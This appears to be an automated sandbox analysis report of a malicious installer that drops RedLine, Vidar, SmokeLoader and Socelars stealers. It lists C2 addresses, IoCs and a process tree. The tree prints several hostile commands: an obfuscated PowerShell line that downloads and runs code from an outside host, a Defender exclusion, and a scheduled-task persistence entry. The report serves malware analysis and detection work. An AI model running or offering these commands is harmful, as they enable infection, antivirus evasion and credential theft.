redline | f92cfeb06515f18113a950d5bd569a23cdd85514ef509ccff6c5a4e9a08ca4c7

Resubmissions

16-09-2021 20:34

210916-zcme3ahbgj 10

16-09-2021 14:08

210916-rfhmaadeg8 10

Analysis

max time kernel
11s
max time network
104s
platform
windows10_x64
resource
win10-jp
submitted
16-09-2021 20:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

setup_x86_x64_install.exe
Size

7.1MB
MD5

7b15ff87e11bd9bc7512b41635b68aeb
SHA1

3ddf56275a2132a384d251247f38cc086b6db914
SHA256

f92cfeb06515f18113a950d5bd569a23cdd85514ef509ccff6c5a4e9a08ca4c7
SHA512

d16b63a203a3322ec70f99a7ca692770c45710e2c0d50f24bf027d8d41d579d721e8cf5f20cc95436b1640b821b8efe1a3c617232cdc18c13be0e37431f7baab

Score

10^/10

redline smokeloader socelars vidar 706 ani medianew aspackv2 backdoor infostealer stealer suricata trojan vmprotect

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://shellloader.com/welcome

Extracted

Family

vidar

Version

40.6

Botnet

706

https://dimonbk83.tumblr.com/

Attributes

profile_id
706

Extracted

Family

redline

Botnet

ANI

45.142.215.47:27643

Extracted

Family

redline

Botnet

medianew

91.121.67.60:62102

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5744	3348	rundll32.exe	21

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 5 IoCs

resource	yara_rule
behavioral5/memory/4472-318-0x000000000041C5CA-mapping.dmp	family_redline
behavioral5/memory/4472-316-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral5/memory/4116-336-0x000000000041C5D6-mapping.dmp	family_redline
behavioral5/memory/4116-333-0x0000000000400000-0x0000000000422000-memory.dmp	family_redline
behavioral5/memory/4476-382-0x000000000041C5E2-mapping.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

resource	yara_rule
behavioral5/files/0x000600000001ab49-142.dat	family_socelars
behavioral5/files/0x000600000001ab49-172.dat	family_socelars

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral5/memory/1248-280-0x0000000000A00000-0x0000000000AD4000-memory.dmp	family_vidar
behavioral5/memory/1248-282-0x0000000000400000-0x00000000004D7000-memory.dmp	family_vidar

ASPack v2.12-2.42 7 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral5/files/0x000400000001ab2c-123.dat	aspack_v212_v242
behavioral5/files/0x000400000001ab2c-125.dat	aspack_v212_v242
behavioral5/files/0x000400000001ab2b-124.dat	aspack_v212_v242
behavioral5/files/0x000400000001ab2b-128.dat	aspack_v212_v242
behavioral5/files/0x000400000001ab2b-129.dat	aspack_v212_v242
behavioral5/files/0x000400000001ab2e-127.dat	aspack_v212_v242
behavioral5/files/0x000400000001ab2e-132.dat	aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE 9 IoCs

pid	Process
3892	setup_installer.exe
4060	setup_install.exe
3208	Thu115049bf2e.exe
2564	Thu117e9466431bbb9f.exe
4228	Thu11b9fee5fd5b3c.exe
3952	Thu118764660749a3b.exe
1896	LivelyScreenRecMa14.exe
4732	Thu116d4ab7efb7.exe
4780	Thu112e5981b78.exe

VMProtect packed file 3 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral5/files/0x000600000001ab35-146.dat	vmprotect
behavioral5/memory/4732-205-0x0000000140000000-0x0000000140650000-memory.dmp	vmprotect
behavioral5/files/0x000600000001ab35-181.dat	vmprotect

Loads dropped DLL 7 IoCs

pid	Process
4060	setup_install.exe
4060	setup_install.exe
4060	setup_install.exe
4060	setup_install.exe
4060	setup_install.exe
4060	setup_install.exe
4060	setup_install.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 5 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
24	ipinfo.io
110	ipinfo.io
111	ipinfo.io
14	ip-api.com
21	ipinfo.io

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 21 IoCs

pid	pid_target	Process	procid_target
3156	4540	WerFault.exe	125
4268	2564	WerFault.exe	107
5948	2564	WerFault.exe	107
6136	3996	WerFault.exe	123
5396	2564	WerFault.exe	107
5788	3996	WerFault.exe	123
6040	2564	WerFault.exe	107
5232	4540	WerFault.exe	125
2284	3996	WerFault.exe	123
5596	4540	WerFault.exe	125
5692	5868	WerFault.exe	157
5092	3996	WerFault.exe	123
5748	3996	WerFault.exe	123
5840	4540	WerFault.exe	125
1012	4540	WerFault.exe	125
5460	3996	WerFault.exe	123
1036	2564	WerFault.exe	107
6080	3312	WerFault.exe	133
424	3996	WerFault.exe	123
6604	2564	WerFault.exe	107
6980	2564	WerFault.exe	107

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
6520	schtasks.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	22	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of AdjustPrivilegeToken 34 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	3952	Thu118764660749a3b.exe
Token: SeAssignPrimaryTokenPrivilege	3952	Thu118764660749a3b.exe
Token: SeLockMemoryPrivilege	3952	Thu118764660749a3b.exe
Token: SeIncreaseQuotaPrivilege	3952	Thu118764660749a3b.exe
Token: SeMachineAccountPrivilege	3952	Thu118764660749a3b.exe
Token: SeTcbPrivilege	3952	Thu118764660749a3b.exe
Token: SeSecurityPrivilege	3952	Thu118764660749a3b.exe
Token: SeTakeOwnershipPrivilege	3952	Thu118764660749a3b.exe
Token: SeLoadDriverPrivilege	3952	Thu118764660749a3b.exe
Token: SeSystemProfilePrivilege	3952	Thu118764660749a3b.exe
Token: SeSystemtimePrivilege	3952	Thu118764660749a3b.exe
Token: SeProfSingleProcessPrivilege	3952	Thu118764660749a3b.exe
Token: SeIncBasePriorityPrivilege	3952	Thu118764660749a3b.exe
Token: SeCreatePagefilePrivilege	3952	Thu118764660749a3b.exe
Token: SeCreatePermanentPrivilege	3952	Thu118764660749a3b.exe
Token: SeBackupPrivilege	3952	Thu118764660749a3b.exe
Token: SeRestorePrivilege	3952	Thu118764660749a3b.exe
Token: SeShutdownPrivilege	3952	Thu118764660749a3b.exe
Token: SeDebugPrivilege	3952	Thu118764660749a3b.exe
Token: SeAuditPrivilege	3952	Thu118764660749a3b.exe
Token: SeSystemEnvironmentPrivilege	3952	Thu118764660749a3b.exe
Token: SeChangeNotifyPrivilege	3952	Thu118764660749a3b.exe
Token: SeRemoteShutdownPrivilege	3952	Thu118764660749a3b.exe
Token: SeUndockPrivilege	3952	Thu118764660749a3b.exe
Token: SeSyncAgentPrivilege	3952	Thu118764660749a3b.exe
Token: SeEnableDelegationPrivilege	3952	Thu118764660749a3b.exe
Token: SeManageVolumePrivilege	3952	Thu118764660749a3b.exe
Token: SeImpersonatePrivilege	3952	Thu118764660749a3b.exe
Token: SeCreateGlobalPrivilege	3952	Thu118764660749a3b.exe
Token: 31	3952	Thu118764660749a3b.exe
Token: 32	3952	Thu118764660749a3b.exe
Token: 33	3952	Thu118764660749a3b.exe
Token: 34	3952	Thu118764660749a3b.exe
Token: 35	3952	Thu118764660749a3b.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3784 wrote to memory of 3892	3784	setup_x86_x64_install.exe	76
PID 3784 wrote to memory of 3892	3784	setup_x86_x64_install.exe	76
PID 3784 wrote to memory of 3892	3784	setup_x86_x64_install.exe	76
PID 3892 wrote to memory of 4060	3892	setup_installer.exe	77
PID 3892 wrote to memory of 4060	3892	setup_installer.exe	77
PID 3892 wrote to memory of 4060	3892	setup_installer.exe	77
PID 4060 wrote to memory of 4496	4060	setup_install.exe	113
PID 4060 wrote to memory of 4496	4060	setup_install.exe	113
PID 4060 wrote to memory of 4496	4060	setup_install.exe	113
PID 4060 wrote to memory of 3048	4060	setup_install.exe	112
PID 4060 wrote to memory of 3048	4060	setup_install.exe	112
PID 4060 wrote to memory of 3048	4060	setup_install.exe	112
PID 4060 wrote to memory of 752	4060	setup_install.exe	80
PID 4060 wrote to memory of 752	4060	setup_install.exe	80
PID 4060 wrote to memory of 752	4060	setup_install.exe	80
PID 4060 wrote to memory of 4512	4060	setup_install.exe	81
PID 4060 wrote to memory of 4512	4060	setup_install.exe	81
PID 4060 wrote to memory of 4512	4060	setup_install.exe	81
PID 4060 wrote to memory of 4532	4060	setup_install.exe	82
PID 4060 wrote to memory of 4532	4060	setup_install.exe	82
PID 4060 wrote to memory of 4532	4060	setup_install.exe	82
PID 4060 wrote to memory of 4552	4060	setup_install.exe	83
PID 4060 wrote to memory of 4552	4060	setup_install.exe	83
PID 4060 wrote to memory of 4552	4060	setup_install.exe	83
PID 4060 wrote to memory of 4428	4060	setup_install.exe	84
PID 4060 wrote to memory of 4428	4060	setup_install.exe	84
PID 4060 wrote to memory of 4428	4060	setup_install.exe	84
PID 4060 wrote to memory of 4440	4060	setup_install.exe	85
PID 4060 wrote to memory of 4440	4060	setup_install.exe	85
PID 4060 wrote to memory of 4440	4060	setup_install.exe	85
PID 4060 wrote to memory of 3192	4060	setup_install.exe	111
PID 4060 wrote to memory of 3192	4060	setup_install.exe	111
PID 4060 wrote to memory of 3192	4060	setup_install.exe	111
PID 3048 wrote to memory of 3208	3048	cmd.exe	86
PID 3048 wrote to memory of 3208	3048	cmd.exe	86
PID 4060 wrote to memory of 3656	4060	setup_install.exe	110
PID 4060 wrote to memory of 3656	4060	setup_install.exe	110
PID 4060 wrote to memory of 3656	4060	setup_install.exe	110
PID 4496 wrote to memory of 3760	4496	cmd.exe	109
PID 4496 wrote to memory of 3760	4496	cmd.exe	109
PID 4496 wrote to memory of 3760	4496	cmd.exe	109
PID 4060 wrote to memory of 3220	4060	setup_install.exe	108
PID 4060 wrote to memory of 3220	4060	setup_install.exe	108
PID 4060 wrote to memory of 3220	4060	setup_install.exe	108
PID 4532 wrote to memory of 2564	4532	cmd.exe	107
PID 4532 wrote to memory of 2564	4532	cmd.exe	107
PID 4532 wrote to memory of 2564	4532	cmd.exe	107
PID 752 wrote to memory of 4228	752	cmd.exe	106
PID 752 wrote to memory of 4228	752	cmd.exe	106
PID 752 wrote to memory of 4228	752	cmd.exe	106
PID 4512 wrote to memory of 3952	4512	cmd.exe	87
PID 4512 wrote to memory of 3952	4512	cmd.exe	87
PID 4512 wrote to memory of 3952	4512	cmd.exe	87
PID 4060 wrote to memory of 1460	4060	setup_install.exe	88
PID 4060 wrote to memory of 1460	4060	setup_install.exe	88
PID 4060 wrote to memory of 1460	4060	setup_install.exe	88
PID 4428 wrote to memory of 1896	4428	cmd.exe	131
PID 4428 wrote to memory of 1896	4428	cmd.exe	131
PID 4428 wrote to memory of 1896	4428	cmd.exe	131
PID 4060 wrote to memory of 4036	4060	setup_install.exe	104
PID 4060 wrote to memory of 4036	4060	setup_install.exe	104
PID 4060 wrote to memory of 4036	4060	setup_install.exe	104
PID 4552 wrote to memory of 4732	4552	cmd.exe	103
PID 4552 wrote to memory of 4732	4552	cmd.exe	103

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3784
- C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
  "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3892
- - C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\setup_install.exe
    "C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\setup_install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:4060
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu11b9fee5fd5b3c.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:752
    - - C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu11b9fee5fd5b3c.exe
        
        Thu11b9fee5fd5b3c.exe
        5⤵
        Executes dropped EXE
        
        PID:4228
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu118764660749a3b.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4512
    - - C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu118764660749a3b.exe
        
        Thu118764660749a3b.exe
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3952
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        6⤵
        
        PID:6828
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu117e9466431bbb9f.exe /mixone
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4532
    - - C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu117e9466431bbb9f.exe
        
        Thu117e9466431bbb9f.exe /mixone
        5⤵
        Executes dropped EXE
        
        PID:2564
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 656
        6⤵
        Program crash
        
        PID:4268
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 672
        6⤵
        Program crash
        
        PID:5948
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 632
        6⤵
        Program crash
        
        PID:5396
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 660
        6⤵
        Program crash
        
        PID:6040
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 888
        6⤵
        Program crash
        
        PID:1036
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 972
        6⤵
        Program crash
        
        PID:6604
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2564 -s 1100
        6⤵
        Program crash
        
        PID:6980
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu116d4ab7efb7.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4552
    - - C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu116d4ab7efb7.exe
        
        Thu116d4ab7efb7.exe
        5⤵
        Executes dropped EXE
        
        PID:4732
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu11787d2b833e6.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4428
    - - C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu11787d2b833e6.exe
        
        Thu11787d2b833e6.exe
        5⤵
        
        PID:1896
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu113e650b5e.exe
      4⤵
      PID:4440
    - - C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu113e650b5e.exe
        
        Thu113e650b5e.exe
        5⤵
        
        PID:4808
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu1171b1ca5023f5d2.exe
      4⤵
      PID:1460
    - - C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu1171b1ca5023f5d2.exe
        
        Thu1171b1ca5023f5d2.exe
        5⤵
        
        PID:524
      - C:\Users\Admin\AppData\Local\Temp\tmp501E_tmp.exe
        
        "C:\Users\Admin\AppData\Local\Temp\tmp501E_tmp.exe"
        6⤵
        
        PID:4936
        
        C:\Users\Admin\AppData\Local\Temp\tmp501E_tmp.exe
        
        C:\Users\Admin\AppData\Local\Temp\tmp501E_tmp.exe
        7⤵
        
        PID:4476
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu1189012621353ba47.exe
      4⤵
      PID:4852
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu118c8b4c3885d897d.exe
      4⤵
      PID:4748
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu11f1187a97f50d9c.exe
      4⤵
      PID:4036
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu1170fdf4c09b1.exe
      4⤵
      PID:3220
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu1160e2804caf.exe
      4⤵
      PID:3656
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu112e5981b78.exe
      4⤵
      PID:3192
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c Thu115049bf2e.exe
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3048
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4496

C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu115049bf2e.exe
Thu115049bf2e.exe
1⤵
- Executes dropped EXE
PID:3208
- C:\Users\Admin\AppData\Roaming\6392448.scr
  "C:\Users\Admin\AppData\Roaming\6392448.scr" /S
  2⤵
  PID:3780
- C:\Users\Admin\AppData\Roaming\1986945.scr
  "C:\Users\Admin\AppData\Roaming\1986945.scr" /S
  2⤵
  PID:600
- C:\Users\Admin\AppData\Roaming\3932392.scr
  "C:\Users\Admin\AppData\Roaming\3932392.scr" /S
  2⤵
  PID:3312
- - C:\Windows\system32\WerFault.exe
    C:\Windows\system32\WerFault.exe -u -p 3312 -s 1748
    3⤵
    - Program crash
    PID:6080
- C:\Users\Admin\AppData\Roaming\2187882.scr
  "C:\Users\Admin\AppData\Roaming\2187882.scr" /S
  2⤵
  PID:5276

C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu1170fdf4c09b1.exe
Thu1170fdf4c09b1.exe
1⤵
PID:4840
- C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu1170fdf4c09b1.exe
  C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu1170fdf4c09b1.exe
  2⤵
  PID:2512
- C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu1170fdf4c09b1.exe
  C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu1170fdf4c09b1.exe
  2⤵
  PID:4472

C:\Users\Admin\AppData\Local\Temp\7zS43F6AB61\Thu1160e2804caf.exe
Thu1160e2804caf.exe
1⤵
PID:664
- C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
  2⤵
  PID:4676
- - C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe
    "C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"
    3⤵
    PID:2084
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
      4⤵
      PID:6732
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        5⤵
        Creates scheduled task(s)
        
        PID:6520
  - - C:\Users\Admin\AppData\Roaming\services64.exe
      "C:\Users\Admin\AppData\Roaming\services64.exe"
      4⤵
      PID:6476
- - C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe
    "C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"
    3⤵
    PID:4704
  - - C:\ProgramData\8847264.exe
      "C:\ProgramData\8847264.exe"
      4⤵
      PID:5472
  - - C:\ProgramData\7149467.exe
      "C:\ProgramData\7149467.exe"
      4⤵
      PID:5868
    - - C:\ProgramData\7149467.exe
        
        "C:\ProgramData\7149467.exe"
        5⤵
        
        PID:5588
    - - C:\ProgramData\7149467.exe
        
        "C:\ProgramData\7149467.exe"
        5⤵
        
        PID:5860
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 1156
        5⤵
        Program crash
        
        PID:5692
  - - C:\ProgramData\5266778.exe
      "C:\ProgramData\5266778.exe"
      4⤵
      PID:5888
- - C:\Users\Admin\AppData\Local\Temp\2.exe
    "C:\Users\Admin\AppData\Local\Temp\2.exe"
    3⤵
    PID:5024
  - - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
      4⤵
      PID:5208
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\zelda3847.bat" "
        5⤵
        
        PID:5412
      - C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\inst.exe
        
        inst.exe
        6⤵
        
        PID:6768
        
        C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\inst.exe
        
        inst.exe
        7⤵
        
        PID:6960
        
        C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"
        8⤵
        
        PID:6140
        
        C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"
        9⤵
        
        PID:6540
      - C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\FoxyIDM82.exe
        
        FoxyIDM82.exe
        6⤵
        
        PID:7024
- - C:\Users\Admin\AppData\Local\Temp\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup.exe"
    3⤵
    PID:3996
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 808
      4⤵
      Program crash
      PID:6136
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 840
      4⤵
      Program crash
      PID:5788
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 872
      4⤵
      Program crash
      PID:2284
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 964
      4⤵
      Program crash
      PID:5092
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 1020
      4⤵
      Program crash
      PID:5748
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 976
      4⤵
      Program crash
      PID:5460
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3996 -s 1028
      4⤵
      Program crash
      PID:424
- - C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v4.exe
    "C:\Users\Admin\AppData\Local\Temp\ShadowVPNInstaller_v4.exe"
    3⤵
    PID:4540
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 260
      4⤵
      Program crash
      PID:3156
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 480
      4⤵
      Program crash
      PID:5232
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 484
      4⤵
      Program crash
      PID:5596
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 504
      4⤵
      Program crash
      PID:5840
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 536
      4⤵
      Program crash
      PID:1012
- - C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMa14.exe
    "C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecMa14.exe"
    3⤵
    - Executes dropped EXE
    PID:1896
  - - C:\Users\Admin\AppData\Local\Temp\tmp7886_tmp.exe
      "C:\Users\Admin\AppData\Local\Temp\tmp7886_tmp.exe"
      4⤵
      PID:2848
    - - C:\Users\Admin\AppData\Local\Temp\tmp7886_tmp.exe
        
        C:\Users\Admin\AppData\Local\Temp\tmp7886_tmp.exe
        5⤵
        
        PID:2284
- - C:\Users\Admin\AppData\Local\Temp\6.exe
    "C:\Users\Admin\AppData\Local\Temp\6.exe"
    3⤵
    PID:5212
  - - C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
      4⤵
      PID:4484
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\zelda3847.bat" "
        5⤵
        
        PID:2732
      - C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\inst.exe
        
        inst.exe
        6⤵
        
        PID:6780
        
        C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\inst.exe
        
        inst.exe
        7⤵
        
        PID:6908
        
        C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"
        8⤵
        
        PID:3992
        
        C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\e0171c4c73\sqtvvs.exe"
        9⤵
        
        PID:2456
      - C:\Users\Admin\AppData\Roaming\new\FoxyIDM82\FoxyIDM82.exe
        
        FoxyIDM82.exe
        6⤵
        
        PID:7032
        
        C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp" -d "C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\"
        7⤵
        
        PID:4744
- - C:\Users\Admin\AppData\Local\Temp\setup_2.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
    3⤵
    PID:5464
  - - C:\Users\Admin\AppData\Local\Temp\is-FS57M.tmp\setup_2.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-FS57M.tmp\setup_2.tmp" /SL5="$103C4,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
      4⤵
      PID:5592
    - - C:\Users\Admin\AppData\Local\Temp\setup_2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        5⤵
        
        PID:6076
      - C:\Users\Admin\AppData\Local\Temp\is-DD27V.tmp\setup_2.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-DD27V.tmp\setup_2.tmp" /SL5="$203FE,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
        6⤵
        
        PID:5268
        
        C:\Users\Admin\AppData\Local\Temp\is-K1I20.tmp\postback.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-K1I20.tmp\postback.exe" ss1
        7⤵
        
        PID:1592
        
        C:\Windows\SysWOW64\explorer.exe
        
        explorer.exe ss1
        8⤵
        
        PID:3220
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
        9⤵
        
        PID:6784
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
